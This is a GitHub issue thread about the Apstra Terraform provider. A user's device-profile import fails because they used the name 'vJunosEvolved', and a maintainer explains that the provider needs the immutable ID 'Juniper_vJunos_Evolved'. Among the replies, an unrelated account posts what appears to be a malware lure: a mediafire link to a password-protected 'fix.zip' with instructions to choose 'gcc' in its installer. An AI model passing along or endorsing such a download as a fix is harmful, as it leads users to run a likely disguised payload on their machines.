### ISSUE TITLE
Error import device profile for Apstra Freeform

### ISSUE THREAD

**Issue by ihadi581** [Juniper/terraform-provider-apstra#814]
i try base on the document with configuration :

```
resource "apstra_freeform_device_profile" "vjunos_evo" {
  blueprint_id      = apstra_freeform_blueprint.dc1.id
  device_profile_id = "vJunosEvolved"
```

 the output is failed : 
```
│ Error: error importing DeviceProfile
│ 
│   with apstra_freeform_device_profile.vjunos_evo,
│   on dc1-infra.tf line 24, in resource "apstra_freeform_device_profile" "vjunos_evo":
│   24: resource "apstra_freeform_device_profile" "vjunos_evo" {
│ 
│ {"api_response":null,"config_blueprint_version":0,"errors":{"device_profile_ids":{"0":"Device profile 'vJunosEvolved' is not found in global catalog"}},"error_code":422} - http response ''
│ at 'http://192.187.125.211:8443/api/blueprints/2965ddf3-7ad7-474c-a07c-f90b202d1671/device-profiles/import?async=full&async=full'
```

and try edit tf file with this : 
```
resource "apstra_freeform_device_profile" "vjunos_evo" {
  blueprint_id      = apstra_freeform_blueprint.dc1.id
  device_profile_id = "Juniper_vJunos_Evolved"
```
and try terafrom apply, terafrom can be apply to apstra. i think this some bug please check again what correct device id in configuration.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chrismarget-j** [comment]
This looks like the expected behavior. My Apstra has a pre-loaded device profile with ID `Juniper_vJunos_Evolved` and Name `vJunosEvolved`:

<img width="880" alt="Screenshot 2024-08-26 at 6 55 32 AM" src="https://github.com/user-attachments/assets/d53025ee-79c1-418d-9deb-dcad5c426a0e">

Most pre-loaded objects have "friendly" IDs which can be easily mistaken for names. It leads to a lot of confusion.

**Comment by ihadi581** [comment]
sure, so this expected we follow from ID device profile global.

**Comment by chrismarget-j** [comment]
Yes, exactly. We deal in IDs *almost* exclusively because they're immutable.

Referencing objects by (changeable) labels would lead to even more confusion.
